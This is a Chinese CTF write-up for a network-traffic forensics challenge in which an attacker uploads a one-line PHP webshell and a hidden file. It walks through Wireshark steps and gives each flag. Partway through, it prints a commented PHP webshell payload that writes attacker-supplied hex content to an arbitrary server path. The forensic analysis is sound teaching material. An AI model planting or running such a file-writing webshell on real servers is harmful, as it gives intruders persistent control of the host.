当前位置: 首页 > news >正文

20250509_信安一把梭_黑客

Tags:流量分析, 应急响应, webshell, 信安一把梭

0x00. 题目

某天晚上安服仔小辉辉上班摸鱼期间突然发现服务器登入页面被挤掉线了,于是第六感告诉他,服务器肯定是被黑客攻击了,于是他赶紧把服务器的网线拔了并调取了那段时间的流量,然后慌忙的找到你,求求你救救安服仔吧

  1. 分析流量找到黑客查看的第一张图片,并将图片的文件名作为flag提交

  2. 分析流量找到黑客上传的一句话木马,并将文件名作为flag提交

  3. 分析流量找到黑客上传的一句话木马,并将一句话木马的密码作为flag提交

  4. 分析流量找到黑客上传的隐藏文件,并将文件名作为flag提交

  5. 分析流量找到黑客上传的隐藏文件,并将里面的内容提交(内容提示flag{...})


附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件

附件名称:20250509_信安一把梭_黑客.zip

0x01. WP

1. 分析流量找到黑客查看的第一张图片,并将图片的文件名作为flag提交

通过导出http对象定位图片文件,找到内容及文件大小,flag{hacker.png}

image

2. 分析流量找到黑客上传的一句话木马,并将文件名作为flag提交

继续浏览HTTP对象列表找到对应一句话木马,flag{1.php}

image

3. 分析流量找到黑客上传的一句话木马,并将一句话木马的密码作为flag提交

追踪相应HTTP流,找到对应的木马密码,flag{action}

image

拼接查看了一下php脚本

<?php// 关闭错误显示,避免暴露敏感信息@ini_set("display_errors","0");// 设置脚本执行时间无限制@set_time_limit(0);// 禁用魔术引号(已废弃,仅旧版PHP有效)@set_magic_quotes_runtime(0);// 输出响应开始标记echo("->|");// 解码并获取目标文件路径(z1参数需Base64编码)$f = base64_decode($_POST["z1"]);// 获取待写入的文件内容(z2参数)$c = $_POST["z2"];// 移除内容中的回车和换行符(防止格式干扰)$c = str_replace("\r","", $c);$c = str_replace("\n","", $c);// 将z2内容按每两个字符分割,并转换为URL编码格式后解码// 例如:输入"616263"会转换为"%61%62%63",解码后为"abc"$buf = "";for($i=0; $i<strlen($c); $i+=2) {$buf .= urldecode("%" . substr($c, $i, 2));}// 尝试将解码后的内容写入目标文件// 使用@抑制错误,成功写入输出1,失败输出0$file = @fopen($f, "w"); // 以写入模式打开文件$result = @fwrite($file, $buf); // 写入内容echo ($result ? "1" : "0"); // 输出响应结束标记echo("|<-");die();// z1=/var/www/upload/images/jiaoyi.txt
// z2=dai zhe chengyi go to jiaoyi!

4. 分析流量找到黑客上传的隐藏文件,并将文件名作为flag提交

查看所有POST请求:http.request.method eq "POST"

找到example1.php的请求,找到对应的文件名和文件内容

flag{hnt.txt}

image

5. 分析流量找到黑客上传的隐藏文件,并将里面的内容提交(内容提示flag{...})

同上,flag{f1ag{si11yb0yemmm}}

http://www.hskmm.com/?act=detail&tid=13410

相关文章:

  • c# 保存文件 - 先保存到临时文件,保存成功后修改文件名
  • 达芬奇标记测量线文字标题动画预设(Tracked Measuring Lines)使用指南
  • 20250427_信安一把梭_No11
  • 运营商数据分类分级:最佳实践、典型案例与智能化方案
  • AT_abc413_g [ABC413G] Big Banned Grid
  • .NET性能优化-使用RecyclableBuffer取代RecyclableMemoryStream
  • css样式:button边框贪吃蛇加载效果
  • 什么是NIC(网络接口卡)?
  • 汽车行业相关技术及其分类
  • 视频剪辑效率翻倍!CyberLink PowerDirector 从入门到专业的全能解决方案
  • 20250415_信安一把梭_encode
  • 日常练习另一部分
  • 每天一个安卓测试开发小知识之 (六)---常用的adb 命令第四期
  • SAP-ABAP中STOP,EXIT,CHECK,RETURN,CONTINUE,LEAVE,REJECT的区别
  • Linux开机启动进入紧急模式emergency mode的解决方法 - 规格严格
  • Arduino ide 软件 不建议大家使用 缺点多多
  • 视频融合平台EasyCVR国标GB28181视频诊断功能详解与实践
  • Refit Consul
  • 故障处理:Oracle 19.20未知BUG导致oraagent进程内存泄漏的案例处理
  • 麒麟服务器操作系统查询可用的内核版本以及安装和降级命令
  • esp32 stm32 ros2 三者区别
  • 20250406_信安一把梭_测试篇
  • 前端 10 个 JS 神 API,开箱即用
  • 故障处理:清除 DBA_DATAPUMP_JOBS 视图中的异常数据泵作业
  • Web自动化测试智能体详解
  • Queue 配合Thread使用
  • MyEMS 进阶应用:从单厂能耗管理到集团跨区域能源数据协同分析
  • Playwright自动化测试框架与AI智能体应用
  • 以下内容在if判定的时候会被判定为 假
  • Python __init__.py文件